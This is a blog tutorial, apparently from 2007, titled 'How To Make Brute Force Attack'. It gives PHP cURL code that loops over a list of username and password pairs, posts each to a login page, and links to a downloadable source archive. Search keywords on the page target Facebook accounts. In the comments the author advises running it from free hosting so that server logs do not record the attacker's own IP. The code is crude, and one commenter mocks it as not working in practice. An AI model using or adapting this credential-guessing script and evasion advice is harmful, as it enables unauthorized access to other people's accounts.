Your Ad Here

How To Make Brute Force Attack


To make brute force attack you can use CURL library to grab web content .

Brute Force Attack here is to try to find exact username and password which is had by a site..

For example you want to login …. if you try one by one it will take a lot of time

But with this code you just make list of username and password …

And the program which will try all the list automatically …

This code can’t be process if the site has CAPTCHA or Generate Image Verification

You can download source code here :

http://phptutorial.byethost13.com/BFA.zip

<?

function InsertAuto($username,$password)
{
$url=”http://localhost/login.php“;
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt ($ch, CURLOPT_POST, 1);
$post_fields = “username=$username&password=$password”;
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response_string = curl_exec($ch);
curl_close($ch);
return $response_string;
}

$row[0][0] = “username1″;
$row[0][1] = “password1″;
$row[1][0] = “username2″;
$row[1][1] = “password2″;
$count = 2;
for ($i=0;$i<$count;$i++)
{
InsertAuto($row[$i][0],$row[$i][1]);
}
?>







People are coming into this page using keywords :  internet brute force attack,  brute force password facebook,  brut force login.php,  brute force facebook attack,  brute force code
This keyword are get by search engine terms.
Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • del.icio.us
  • Facebook
  • Google
  • StumbleUpon
  • Furl

5 Responses to “How To Make Brute Force Attack

  • 1
    You are a crap programmer
    December 26th, 2007 20:05

    Can you guess why the code on this page makes the author a shitty, shitty programmer?

    Hint - try it in real life.

  • 2
    admin
    December 26th, 2007 23:11

    hmm…
    it can’t be done .. if the website has captcha …
    of course i didn’t show all the code…
    only the basic idea …

  • 3
    You are a crap programmer
    December 27th, 2007 01:49

    You can’t see the fault, and you’re writing how-to’s. Hilarious.

  • 4
    Hmmmm
    December 28th, 2007 06:51

    Wouldn’t there be a lot of entries in the webserver log listing your IP address?

  • 5
    admin
    December 28th, 2007 08:46

    Of course there will be a lot of entries (IP Address) … in web server log …
    so it must be done in free hosting ….



Leave a Reply

Note: Any comments are permitted only because the site owner is letting you post, and any comments will be removed for any reason at the absolute discretion of the site owner.

*
To prove that you're not a bot, enter this code
Anti-Spam Image